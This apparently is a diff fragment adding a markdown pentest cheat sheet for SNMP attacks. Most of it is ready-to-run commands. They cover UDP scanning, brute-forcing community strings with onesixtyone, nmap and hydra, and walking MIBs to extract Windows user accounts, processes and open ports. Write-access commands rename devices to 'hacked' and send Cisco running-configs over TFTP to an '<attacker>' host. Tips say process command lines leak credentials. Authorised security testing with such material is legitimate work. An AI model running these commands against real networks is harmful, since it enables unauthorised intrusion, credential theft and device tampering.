+
```
|
|
14
|
+
sudo apt-get install -y snmp snmp-mibs-downloader snmpwalk onesixtyone snmpenum
|
|
15
|
+
pip install snmp-check --break-system-packages
|
|
16
|
+
# snmp-check: sudo apt-get install -y snmp-check
|
|
17
|
+
```
|
|
18
|
+
|
|
19
|
+
**Ports:** 161/UDP (agent), 162/UDP (trap)
|
|
20
|
+
|
|
21
|
+
---
|
|
22
|
+
|
|
23
|
+
## Reconnaissance
|
|
24
|
+
|
|
25
|
+
nmap -p 161 <target> -sU --open -sV
|
|
26
|
+
nmap -p 161 <target> -sU --script snmp-info,snmp-brute,snmp-sysdescr
|
|
27
|
+
|
|
28
|
+
---
|
|
29
|
+
|
|
30
|
+
## Community String Brute Force
|
|
31
|
+
|
|
32
|
+
# onesixtyone — fast community string brute:
|
|
33
|
+
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <target>
|
|
34
|
+
onesixtyone -i targets.txt -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt
|
|
35
|
+
|
|
36
|
+
# Common community strings to try:
|
|
37
|
+
# public, private, community, manager, admin, cisco, secret, internal, network
|
|
38
|
+
|
|
39
|
+
# nmap:
|
|
40
|
+
nmap -p 161 -sU --script snmp-brute <target>
|
|
41
|
+
nmap -p 161 -sU --script snmp-brute --script-args snmp-brute.communitiesdb=/usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt <target>
|
|
42
|
+
|
|
43
|
+
# hydra:
|
|
44
|
+
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt -v <target> snmp
|
|
45
|
+
|
|
46
|
+
---
|
|
47
|
+
|
|
48
|
+
## MIB Walking (Data Extraction)
|
|
49
|
+
|
|
50
|
+
Once community string found, walk the entire MIB tree:
|
|
51
|
+
|
|
52
|
+
# Full MIB walk:
|
|
53
|
+
snmpwalk -v 2c -c public <target> # Version 2c
|
|
54
|
+
snmpwalk -v 1 -c public <target> # Version 1
|
|
55
|
+
snmpwalk -v 2c -c public <target> > output/snmp_full.txt
|
|
56
|
+
|
|
57
|
+
# Setup MIBs for human-readable output:
|
|
58
|
+
sudo apt-get install -y snmp-mibs-downloader
|
|
59
|
+
sudo download-mibs
|
|
60
|
+
# Edit /etc/snmp/snmp.conf: comment out "mibs :" line
|
|
61
|
+
|
|
62
|
+
# Specific OID queries:
|
|
63
|
+
snmpwalk -v 2c -c public <target> 1.3.6.1.2.1.1 # System info
|
|
64
|
+
snmpwalk -v 2c -c public <target> 1.3.6.1.2.1.25.4.2 # Running processes
|
|
65
|
+
snmpwalk -v 2c -c public <target> 1.3.6.1.2.1.25.6.3 # Installed software
|
|
66
|
+
snmpwalk -v 2c -c public <target> 1.3.6.1.2.1.4.20 # IP addresses
|
|
67
|
+
snmpwalk -v 2c -c public <target> 1.3.6.1.2.1.4.21 # Routing table
|
|
68
|
+
snmpwalk -v 2c -c public <target> 1.3.6.1.2.1.6.13 # Open TCP ports
|
|
69
|
+
snmpwalk -v 2c -c public <target> 1.3.6.1.4.1.77.1.2.25 # Windows users
|
|
70
|
+
|
|
71
|
+
# snmpget — specific value:
|
|
72
|
+
snmpget -v 2c -c public <target> sysDescr.0 # System description
|
|
73
|
+
snmpget -v 2c -c public <target> sysName.0 # Hostname
|
|
74
|
+
|
|
75
|
+
---
|
|
76
|
+
|
|
77
|
+
## snmp-check — Automated Comprehensive Enumeration
|
|
78
|
+
|
|
79
|
+
snmp-check <target> # Default (public, v2c)
|
|
80
|
+
snmp-check -c private <target> # With private community
|
|
81
|
+
snmp-check -v 1 -c public <target> # Force version 1
|
|
82
|
+
|
|
83
|
+
# Output includes:
|
|
84
|
+
# System info, Hostname, Contact, Location
|
|
85
|
+
# Network interfaces and IPs
|
|
86
|
+
# Routing table
|
|
87
|
+
# Running processes
|
|
88
|
+
# TCP/UDP open ports
|
|
89
|
+
# Installed software (Windows)
|
|
90
|
+
# User accounts (Windows)
|
|
91
|
+
# Storage info
|
|
92
|
+
|
|
93
|
+
---
|
|
94
|
+
|
|
95
|
+
## High-Value SNMP Data
|
|
96
|
+
|
|
97
|
+
# Windows user accounts (OID .1.3.6.1.4.1.77.1.2.25):
|
|
98
|
+
snmpwalk -v 2c -c public <target> .1.3.6.1.4.1.77.1.2.25
|
|
99
|
+
|
|
100
|
+
# Running processes (extract usernames from process list):
|
|
101
|
+
snmpwalk -v 2c -c public <target> .1.3.6.1.2.1.25.4.2.1.2
|
|
102
|
+
|
|
103
|
+
# Network interfaces + IPs:
|
|
104
|
+
snmpwalk -v 2c -c public <target> .1.3.6.1.2.1.4.20.1
|
|
105
|
+
|
|
106
|
+
# TCP connections (shows what services connect to what):
|
|
107
|
+
snmpwalk -v 2c -c public <target> .1.3.6.1.2.1.6.13.1.3
|
|
108
|
+
|
|
109
|
+
# Cisco device — config via SNMP (if write access):
|
|
110
|
+
snmpset -v 2c -c private <target> .1.3.6.1.4.1.9.2.1.55.0 s "tftp://<attacker>/config"
|
|
111
|
+
|
|
112
|
+
---
|
|
113
|
+
|
|
114
|
+
## SNMP Write Access (Community = private)
|
|
115
|
+
|
|
116
|
+
# Change system name:
|
|
117
|
+
snmpset -v 2c -c private <target> sysName.0 s "hacked"
|
|
118
|
+
|
|
119
|
+
# Cisco: copy running-config via TFTP:
|
|
120
|
+
snmpset -v 2c -c private <target> .1.3.6.1.4.1.9.2.1.55.0 s "tftp://<attacker>/running-config"
|
|
121
|
+
|
|
122
|
+
---
|
|
123
|
+
|
|
124
|
+
## SNMP v3 Enumeration
|
|
125
|
+
|
|
126
|
+
SNMPv3 uses authentication + encryption — more secure but still testable:
|
|
127
|
+
|
|
128
|
+
# Enumerate v3 users:
|
|
129
|
+
nmap -p 161 -sU --script snmp-brute --script-args snmp-brute.v3authlist=users.txt <target>
|
|
130
|
+
|
|
131
|
+
# braa — fast v3:
|
|
132
|
+
braa public@<target>:.1.3.6.1.2.1.1.1.0
|
|
133
|
+
|
|
134
|
+
---
|
|
135
|
+
|
|
136
|
+
## Pro Tips
|
|
137
|
+
|
|
138
|
+
1. "public" and "private" work on >60% of SNMP-enabled devices — try these first
|
|
139
|
+
2. SNMP reveals running processes, open ports, and user accounts without any auth on v1/v2c
|
|
140
|
+
3. Cisco/network device SNMP often reveals VPN credentials in process cmdline
|
|
141
|
+
4. Windows SNMP + "public" → `.1.3.6.1.4.1.77.1.2.25` lists local user accounts
|
|
142
|
+
5. Write access with "private" on network gear → extract full device config via TFTP
|
|
143
|
+
6. UDP scan is required (`-sU`) — TCP SNMP is rare; many scanners miss it
|
|
144
|
+
|
|
145
|
+
## Summary
|
|
146
|
+
|
|
147
|
+
SNMP testing: `nmap -sU -p 161` → `onesixtyone` community brute force → `snmp-check <target>` for full enumeration → `snmpwalk -v 2c -c public` for specific OID mining. Focus on: running processes (credentials in cmdline), user accounts (Windows SNMP), network interfaces, and installed software version fingerprinting.
|